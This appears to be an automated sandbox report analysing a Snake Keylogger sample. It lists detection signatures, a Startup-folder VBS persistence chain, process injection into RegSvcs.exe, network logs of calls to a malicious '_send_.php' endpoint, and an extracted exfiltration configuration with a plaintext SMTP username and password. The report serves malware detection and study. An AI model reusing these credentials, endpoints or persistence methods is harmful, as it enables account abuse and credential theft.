Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PsBygexGwH.exe

Overview

General Information

Sample name:PsBygexGwH.exe
renamed because original name is a hash value
Original sample name:f36cebf205cb95b23bea11f15356461b51b40cd0bd586e5c5f151a6396a6151a.exe
Analysis ID:1422242
MD5:222d05295014f8974d6e358e1507770e
SHA1:d1475a87d8aad1852eda1ac93ebb0bbbb1f08e0b
SHA256:f36cebf205cb95b23bea11f15356461b51b40cd0bd586e5c5f151a6396a6151a
Tags:exe
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Snake Keylogger
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Potentially malicious time measurement code found
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PsBygexGwH.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\PsBygexGwH.exe" MD5: 222D05295014F8974D6E358E1507770E)
    • name.exe (PID: 3052 cmdline: "C:\Users\user\Desktop\PsBygexGwH.exe" MD5: 90D7DF3194AF25C7942DCDB56E8902F3)
      • RegSvcs.exe (PID: 5444 cmdline: "C:\Users\user\Desktop\PsBygexGwH.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 1908 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • name.exe (PID: 4556 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 90D7DF3194AF25C7942DCDB56E8902F3)
      • RegSvcs.exe (PID: 3844 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x14a08:$a1: get_encryptedPassword
        • 0x14cfe:$a2: get_encryptedUsername
        • 0x14814:$a3: get_timePasswordChanged
        • 0x1490f:$a4: get_passwordField
        • 0x14a1e:$a5: set_encryptedPassword
        • 0x1604a:$a7: get_logins
        • 0x15fad:$a10: KeyLoggerEventArgs
        • 0x15c46:$a11: KeyLoggerEventArgsEventHandler
        00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmpMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
        • 0x1c2ef:$a2: \Comodo\Dragon\User Data\Default\Login Data
        • 0x1b521:$a3: \Google\Chrome\User Data\Default\Login Data
        • 0x1b954:$a4: \Orbitum\User Data\Default\Login Data
        • 0x1c993:$a5: \Kometa\User Data\Default\Login Data
        Click to see the 27 entries
        SourceRuleDescriptionAuthorStrings
        9.2.name.exe.40c0000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          9.2.name.exe.40c0000.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            9.2.name.exe.40c0000.1.raw.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              9.2.name.exe.40c0000.1.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x14a08:$a1: get_encryptedPassword
              • 0x14cfe:$a2: get_encryptedUsername
              • 0x14814:$a3: get_timePasswordChanged
              • 0x1490f:$a4: get_passwordField
              • 0x14a1e:$a5: set_encryptedPassword
              • 0x1604a:$a7: get_logins
              • 0x15fad:$a10: KeyLoggerEventArgs
              • 0x15c46:$a11: KeyLoggerEventArgsEventHandler
              9.2.name.exe.40c0000.1.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x1c2ef:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x1b521:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x1b954:$a4: \Orbitum\User Data\Default\Login Data
              • 0x1c993:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 21 entries

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 1908, ProcessName: wscript.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 1908, ProcessName: wscript.exe

              Data Obfuscation

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 3052, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
              Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
              Source: http://scratchdreams.tkAvira URL Cloud: Label: malware
              Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587"}
              Source: scratchdreams.tkVirustotal: Detection: 6%Perma Link
              Source: https://scratchdreams.tkVirustotal: Detection: 15%Perma Link
              Source: http://scratchdreams.tkVirustotal: Detection: 6%Perma Link
              Source: https://scratchdreams.tk/_send_.php?TSVirustotal: Detection: 14%Perma Link
              Source: PsBygexGwH.exeReversingLabs: Detection: 65%
              Source: PsBygexGwH.exeVirustotal: Detection: 70%Perma Link
              Source: C:\Users\user\AppData\Local\directory\name.exeJoe Sandbox ML: detected
              Source: PsBygexGwH.exeJoe Sandbox ML: detected
              Source: PsBygexGwH.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49738 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49754 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49768 version: TLS 1.2
              Source: Binary string: wntdll.pdbUGP source: name.exe, 00000006.00000003.2997844990.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2997193126.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3128087132.0000000004290000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3129130563.0000000004120000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: name.exe, 00000006.00000003.2997844990.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2997193126.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3128087132.0000000004290000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3129130563.0000000004120000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0018DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0018DBBE
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_001968EE FindFirstFileW,FindClose,0_2_001968EE
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0019698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0019698F
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0018D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0018D076
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0018D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0018D3A9
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00199642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00199642
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_0019979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0019979D
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00199B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00199B2B
              Source: C:\Users\user\Desktop\PsBygexGwH.exeCode function: 0_2_00195C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00195C97
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0032DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_0032DBBE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_003368EE FindFirstFileW,FindClose,6_2_003368EE
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0033698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_0033698F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0032D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0032D076
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0032D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0032D3A9
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00339642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00339642
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0033979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0033979D
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00339B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00339B2B
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00335C97 FindFirstFileW,FindNextFileW,FindClose,6_2_00335C97
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 008EFCD1h7_2_008EFA10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 008EEFDDh7_2_008EEDF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 008EF967h7_2_008EEDF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_008EE310
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_008EE943
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_008EEB23
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7CB61h7_2_04F7C8B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F70751h7_2_04F704A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7C709h7_2_04F7C460
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7F6D1h7_2_04F7F428
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7D869h7_2_04F7D5C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F71011h7_2_04F70D60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7CFB9h7_2_04F7CD10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F715D8h7_2_04F71506
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7E119h7_2_04F7DE70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7F279h7_2_04F7EFD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7BA01h7_2_04F7B758
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7E9C9h7_2_04F7E720
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7FB29h7_2_04F7F880
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F702F1h7_2_04F70040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7C2B1h7_2_04F7C008
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F715D8h7_2_04F711C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7D411h7_2_04F7D168
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F70BB1h7_2_04F70900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7E571h7_2_04F7E2C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7DCC1h7_2_04F7DA18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7BE59h7_2_04F7BBB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7EE21h7_2_04F7EB78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 04F7B5A9h7_2_04F7B300
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06058945h7_2_06058608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 060558C1h7_2_06055618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06055D19h7_2_06055A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_060536CE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06056171h7_2_06055EC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 060565C9h7_2_06056320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06056A21h7_2_06056778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_060533A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_060533B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06056E79h7_2_06056BD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 060502E9h7_2_06050040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 060572FAh7_2_06057050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06050741h7_2_06050498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06057751h7_2_060574A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06050B99h7_2_060508F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06057BA9h7_2_06057900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06050FF1h7_2_06050D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06058001h7_2_06057D58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06055441h7_2_06055198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06058459h7_2_060581B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00AFFCD1h10_2_00AFFA10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00AFEFDDh10_2_00AFEDF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00AFF967h10_2_00AFEDF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_00AFE310
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_00AFE943
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_00AFEB23
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06378945h10_2_06378608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063758C1h10_2_06375618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06375D19h10_2_06375A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06376171h10_2_06375EC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063765C9h10_2_06376320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06376A21h10_2_06376778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_063733B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_063733A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06376E79h10_2_06376BD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063772FAh10_2_06377050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 063702E9h10_2_06370040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06377751h10_2_063774A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06370741h10_2_06370498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06370B99h10_2_063708F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06377BA9h10_2_06377900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06378001h10_2_06377D58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06370FF1h10_2_06370D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06378459h10_2_063781B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06375441h10_2_06375198

              Networking

              barindex
              Source: Yara matchFile source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
              Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
              Source: Joe Sandbox ViewIP Address: 104.21.27.85 104.21.27.85
